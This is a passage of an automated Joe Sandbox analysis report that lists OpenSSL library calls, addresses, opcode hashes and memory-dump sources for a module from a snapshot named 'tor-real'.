                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C0C0BA2
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0C66
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0C0D4A
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Digest$Update$L_cleanseSign$FinalFinal_exInitInit_exO_ctrlO_memcmpR_put_errorX_freeY_freeY_new_raw_private_key__stack_chk_fail
                                                                            • String ID: /
                                                                            • API String ID: 1782661204-2043925204
                                                                            • Opcode ID: a7afdad8ffbdab9cf9d370ef34fdedf5fec806f5da8bb43ab2b73ba2fe24757f
                                                                            • Instruction ID: 24083eb76ff07189d854d0a36e74e30aba43a4ce55e957cb50855bdc0c87ff9b
                                                                            • Opcode Fuzzy Hash: a7afdad8ffbdab9cf9d370ef34fdedf5fec806f5da8bb43ab2b73ba2fe24757f
                                                                            • Instruction Fuzzy Hash: D45167B46093819FD350DF69C08475EFBF1AF89748F51892EE9888B710D779E8488B82
                                                                            APIs
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEB04
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0CEB14
                                                                            • d2i_X509.LIBCRYPTO-1_1 ref: 6C0CEBBE
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CECF1
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0CED0B
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0CED4C
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0CED71
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0CED7B
                                                                            • EVP_PKEY_missing_parameters.LIBCRYPTO-1_1 ref: 6C0CED8D
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEDF4
                                                                            • X509_up_ref.LIBCRYPTO-1_1 ref: 6C0CEDFC
                                                                              • Part of subcall function 6C0BF8E0: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0BF97A
                                                                              • Part of subcall function 6C0BF8E0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0BFB97
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CF0AE
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: O_free$X509_free$L_sk_pop_freeL_sk_pushL_sk_valueO_zallocR_clear_errorX509X509_get0_pubkeyX509_up_refY_missing_parametersd2i_
                                                                            • String ID: @
                                                                            • API String ID: 2205809501-2766056989
                                                                            • Opcode ID: 2125339384031d05cc8c7bdff05b70d92e6315e05ac9503ae35796d78ae775a7
                                                                            • Instruction ID: ab1183416ad6cf62a09ed2db4fe260a4fc847a83df0707d2b37f60245f7fa3cc
                                                                            • Opcode Fuzzy Hash: 2125339384031d05cc8c7bdff05b70d92e6315e05ac9503ae35796d78ae775a7
                                                                            • Instruction Fuzzy Hash: 769115B46097018FD714DF29C58079EBBF5BF89748F25892DE8988B710E734E945CB82
                                                                            APIs
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0D0E5A
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Y_free
                                                                            • String ID: P${
                                                                            • API String ID: 1282063954-1612326427
                                                                            • Opcode ID: 4721c1e60f281edae042e6608ca3aa0c2de0e5a3326e4a52fce70bab335c8d9d
                                                                            • Instruction ID: d6522abd165813b311a2c48b50e0546a1fa34c0701a3602a19adeaa5c6fdf4d6
                                                                            • Opcode Fuzzy Hash: 4721c1e60f281edae042e6608ca3aa0c2de0e5a3326e4a52fce70bab335c8d9d
                                                                            • Instruction Fuzzy Hash: 52B142B06097418FE310CF29C58476EBBF1BF89348F56892DE4989BB50DB75E449CB82
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2$A
                                                                            • API String ID: 0-681408588
                                                                            • Opcode ID: 159a66f2a484f9e72e39ddf259461559822a879618bb1e483b397772a9eb55fd
                                                                            • Instruction ID: 8b12d6c20028964f8444150939a3c3ae4e64e1f36e27e629cf0f7af503ba5e6b
                                                                            • Opcode Fuzzy Hash: 159a66f2a484f9e72e39ddf259461559822a879618bb1e483b397772a9eb55fd
                                                                            • Instruction Fuzzy Hash: 2FB110B0609702AFD3109F65D48836EBBE4FB85348F118A2DE4989B750D7B9E548CF83
                                                                            APIs
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0CC57F
                                                                            • EVP_PKEY_get0_RSA.LIBCRYPTO-1_1 ref: 6C0CC589
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0CC5AD
                                                                            • RAND_bytes.LIBCRYPTO-1_1 ref: 6C0CC5DB
                                                                            • EVP_PKEY_CTX_new.LIBCRYPTO-1_1 ref: 6C0CC614
                                                                            • EVP_PKEY_encrypt_init.LIBCRYPTO-1_1 ref: 6C0CC626
                                                                            • EVP_PKEY_encrypt.LIBCRYPTO-1_1 ref: 6C0CC652
                                                                            • EVP_PKEY_encrypt.LIBCRYPTO-1_1 ref: 6C0CC69E
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0CC6AE
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Y_encrypt$D_bytesO_mallocO_zallocX509_get0_pubkeyX_freeX_newY_encrypt_initY_get0_
                                                                            • String ID: .$0
                                                                            • API String ID: 911164579-446915570
                                                                            • Opcode ID: 5f628c0daf0fcda1c207f93e5ec489629597143562735811c9ad10e7c816c854
                                                                            • Instruction ID: 0142edc1a13ffa49ece74beb8e590a4459537867b41ba9240c6ffc84490cfe92
                                                                            • Opcode Fuzzy Hash: 5f628c0daf0fcda1c207f93e5ec489629597143562735811c9ad10e7c816c854
                                                                            • Instruction Fuzzy Hash: DC41E6B060A7419FD740EF69C58436EBBE4AF48788F51982DE8D8CB740E778D549CB42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: P$h
                                                                            • API String ID: 0-561839982
                                                                            • Opcode ID: 29fcb1816667785bb3edede728a9ea4fe649e33c5be5ae6d18de817cd624c67e
                                                                            • Instruction ID: 14ce5543c4849efd65342cefc2979a9db0b7cb9481b5e11c601b1a2bf3ec880a
                                                                            • Opcode Fuzzy Hash: 29fcb1816667785bb3edede728a9ea4fe649e33c5be5ae6d18de817cd624c67e
                                                                            • Instruction Fuzzy Hash: E6E16D70609701CFD740EF29C58479ABBE0BF88758F148A6DE899AB740D776E944CF82
                                                                            APIs
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,00000001,?,?,6C09FD5E), ref: 6C0A8CD7
                                                                            • OPENSSL_sk_find.LIBCRYPTO-1_1(?,?,?,?,?,?,00000001,?,?,6C09FD5E), ref: 6C0A8D04
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1(?,?,?,?,?,?,00000001,?,?,6C09FD5E), ref: 6C0A8D15
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000001,?,?,6C09FD5E), ref: 6C0A8E12
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_onceL_sk_findL_sk_valueR_flags
                                                                            • String ID:
                                                                            • API String ID: 1582411886-0
                                                                            • Opcode ID: 5f24721565e6eb2c433446c972ec2a7b4a2eea849360b2517e7f809df0e2ea75
                                                                            • Instruction ID: 676a055f25d1645f9d08735ab150e6a102decf509d266816a0d0e5008a2f1c13
                                                                            • Opcode Fuzzy Hash: 5f24721565e6eb2c433446c972ec2a7b4a2eea849360b2517e7f809df0e2ea75
                                                                            • Instruction Fuzzy Hash: C5914171609392CFDB10CFD5C48075AB7F1AB89348F204A1EE8648BB56E734D846CB92
                                                                            APIs
                                                                              • Part of subcall function 6C0A02C0: CRYPTO_clear_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0A02EE
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0A0F0F
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0A0F2A
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A0F55
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A0F6E
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A0F8F
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A0FBA
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A0FDB
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A0FFC
                                                                              • Part of subcall function 6C0A03E0: BIO_free.LIBCRYPTO-1_1 ref: 6C0A03F4
                                                                              • Part of subcall function 6C0A03E0: EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0A040F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A1025
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A1046
                                                                              • Part of subcall function 6C0E9680: CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96B6
                                                                              • Part of subcall function 6C0E9680: CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96D4
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96E2
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96F0
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96FE
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E970C
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E971A
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E9728
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E9736
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E9744
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A1071
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$N_free$O_clear_free$Y_free$L_sk_pop_freeX_free
                                                                            • String ID:
                                                                            • API String ID: 666369201-0
                                                                            • Opcode ID: f46bdf0fb409902ac6f4542bef46c15573cee994f4dbf8b08574441d8fa852ed
                                                                            • Instruction ID: 1cbfb7bb0d51d97e72e476d65b467a3df144765172bfe9165cc34682529f5079
                                                                            • Opcode Fuzzy Hash: f46bdf0fb409902ac6f4542bef46c15573cee994f4dbf8b08574441d8fa852ed
                                                                            • Instruction Fuzzy Hash: A54199B4149740DFD740DFA4D0C9B6EBBE0AF48308F1189ADE8A88F726C774E4488B41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /$D
                                                                            • API String ID: 0-1275706592
                                                                            • Opcode ID: 5ff474e2181476a39bddf35ab86604860f5f990018a31e2cf77abbe51716476b
                                                                            • Instruction ID: 82b7da75facebb025874e85fa0bbf3fd63d2e8f8606deb75b1363b5998b0970a
                                                                            • Opcode Fuzzy Hash: 5ff474e2181476a39bddf35ab86604860f5f990018a31e2cf77abbe51716476b
                                                                            • Instruction Fuzzy Hash: 983247B160A301CFE750CF29C18479ABBE0BF84308F14996DEC988B756D775E884DB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Init$memcpy$A224_A256_A384_D_typeX_md
                                                                            • String ID: $($3$@
                                                                            • API String ID: 2970115762-2970879633
                                                                            • Opcode ID: a282e56b5b532d9b667d5d92d4a19b5d9ae1147f475ae090617b7127338011c4
                                                                            • Instruction ID: 3e23c79d439a64d580f54a7ae9dc9bc540b7031f9457f834156c49763825c7d1
                                                                            • Opcode Fuzzy Hash: a282e56b5b532d9b667d5d92d4a19b5d9ae1147f475ae090617b7127338011c4
                                                                            • Instruction Fuzzy Hash: D2B10375A083518FD320CF29C88075AFBE2BFC9304F15892EE9E897351D775E9498B82
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4A60
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4ADB
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4B16
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4B8D
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4BCD
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4C0D
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4C57
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_malloc$R_put_error
                                                                            • String ID: A
                                                                            • API String ID: 413598087-3554254475
                                                                            • Opcode ID: b6b5522d9acddd346458c489cc32d4eda2cffb18d846eb58108a8052510edb8f
                                                                            • Instruction ID: 4cc9297d7f6c97a6c5ac57511cd31de47b2e0d3f05763fa682fd219c4620bc88
                                                                            • Opcode Fuzzy Hash: b6b5522d9acddd346458c489cc32d4eda2cffb18d846eb58108a8052510edb8f
                                                                            • Instruction Fuzzy Hash: 0E619B75A083109FC7009FA5C18035ABBE1FFC8718F25CA6CE9989B754E774E846CB46
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_malloc
                                                                            • String ID: D$P
                                                                            • API String ID: 2767441526-307317852
                                                                            • Opcode ID: 0346fc124dcaa0779f0702869484e4bc74f11ea74f1667db41d9b41cab18b900
                                                                            • Instruction ID: 0ea8a91954fda80a77e6ae7ab62f3bf10c4f2be6b10c729b345ee97350a7fdc2
                                                                            • Opcode Fuzzy Hash: 0346fc124dcaa0779f0702869484e4bc74f11ea74f1667db41d9b41cab18b900
                                                                            • Instruction Fuzzy Hash: 4081EEB45097058FE710DF29C08079BFBE0BF88318F108A2DE9A98B751C775A994CB86
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$O_reallocmemcpy
                                                                            • String ID: A
                                                                            • API String ID: 1318616892-3554254475
                                                                            • Opcode ID: 51743af754fd3bcce524d2e2d0c8f86c50632710a6da806f00ca67b6d18c4969
                                                                            • Instruction ID: 66d48abe408c7e925e0b47c35e680bb9f6dde37fc7b634172ecda39568fe55c6
                                                                            • Opcode Fuzzy Hash: 51743af754fd3bcce524d2e2d0c8f86c50632710a6da806f00ca67b6d18c4969
                                                                            • Instruction Fuzzy Hash: 984148B52093059FE700DF29C58474FFBE0BF84308F14892DE5A8AB760DB7AD5448B56
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B44A6
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0B4539
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0B4566
                                                                            • OPENSSL_sk_insert.LIBCRYPTO-1_1 ref: 6C0B45C0
                                                                            • X509_VERIFY_PARAM_get_depth.LIBCRYPTO-1_1 ref: 6C0B46A3
                                                                            • X509_VERIFY_PARAM_set_depth.LIBCRYPTO-1_1 ref: 6C0B46B5
                                                                            • CRYPTO_dup_ex_data.LIBCRYPTO-1_1 ref: 6C0B46ED
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0B4738
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0B4754
                                                                            • COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0B476C
                                                                            • COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0B4784
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0B479C
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0B47B4
                                                                            • X509_VERIFY_PARAM_inherit.LIBCRYPTO-1_1 ref: 6C0B4800
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0B4812
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0B4832
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B4D2F
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0B4D63
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B4D97
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0B4DA3
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4DC2
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4DCD
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4DE5
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0B4E4A
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0B4E54
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4E86
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4E91
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4EA9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_free$O_free$X509_$L_sk_dupR_put_errorX509_freeY_free$L_sk_insertL_sk_new_nullL_sk_numL_sk_pushL_sk_valueM_get_depthM_inheritM_set_depthO_dup_ex_dataX509_get0_pubkey
                                                                            • String ID: A
                                                                            • API String ID: 3084767314-3554254475
                                                                            • Opcode ID: a88a1aab1b7fce2a009fc29ec6f8ee2c38ceec5ce1364836decad0cd7f77188c
                                                                            • Instruction ID: d5730d95c30d108aff9dd20534d84065abbf70bcdb1a816c9af3473bfe3962a5
                                                                            • Opcode Fuzzy Hash: a88a1aab1b7fce2a009fc29ec6f8ee2c38ceec5ce1364836decad0cd7f77188c
                                                                            • Instruction Fuzzy Hash: 99215871608700AFD700DFA4C58035EBBF0EF89758F618D1CE5A89BB40D73AE9458B86
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0BEB6F
                                                                            • CRYPTO_strdup.LIBCRYPTO-1_1 ref: 6C0BEB93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_strdup
                                                                            • String ID: D$m$p
                                                                            • API String ID: 2148955802-2783181076
                                                                            • Opcode ID: 1a72b6863c04f2b0cbeaf272175212cb9ea9b42c8ee982f6fb552c88561e606f
                                                                            • Instruction ID: 5ebd35788c7d61ebb992a32ab78345cc58f15547c3635ae3d2f808294ada0905
                                                                            • Opcode Fuzzy Hash: 1a72b6863c04f2b0cbeaf272175212cb9ea9b42c8ee982f6fb552c88561e606f
                                                                            • Instruction Fuzzy Hash: A2B116706097018FE710DF25C48479ABBE0BF85348F1589ACE8A9AB751D776E948CFC2
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094C98
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094D17
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094D6C
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C094DA7
                                                                            • BUF_MEM_grow.LIBCRYPTO-1_1 ref: 6C094DF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc$M_growO_freeR_put_error
                                                                            • String ID: b$m
                                                                            • API String ID: 945272380-1996044831
                                                                            • Opcode ID: 335388741636d897dddc8802415f552e69e85cfb5ca00dbc1e361828e76e3b3e
                                                                            • Instruction ID: 0adc13faae665b4debec00d1233adca8fcd3f388a5a0238ecf742d3584dd1a9f
                                                                            • Opcode Fuzzy Hash: 335388741636d897dddc8802415f552e69e85cfb5ca00dbc1e361828e76e3b3e
                                                                            • Instruction Fuzzy Hash: 6D5189B66053008FDB04DF69E48038ABBE0EF84728F14866DDDA88F755D376E494CBA1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$O_reallocmemcpy
                                                                            • String ID: A
                                                                            • API String ID: 1318616892-3554254475
                                                                            • Opcode ID: 0cdf5b905ae595b14ebcf431cc4d51c332d439585fb3f91126b69ff2c68edb0a
                                                                            • Instruction ID: f151fba9758684128ac651d715a2e62c6ea8b5686ac1125ceb949e3a78533898
                                                                            • Opcode Fuzzy Hash: 0cdf5b905ae595b14ebcf431cc4d51c332d439585fb3f91126b69ff2c68edb0a
                                                                            • Instruction Fuzzy Hash: C9515AB52093029FE300DF65C58475FBBE0FF84708F64892DE498AB750D77AE5488B96
                                                                            APIs
                                                                            • memcpy.MSVCRT ref: 6C0BC567
                                                                            • CRYPTO_THREAD_read_lock.LIBCRYPTO-1_1 ref: 6C0BC583
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0BC598
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC5BA
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC5EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
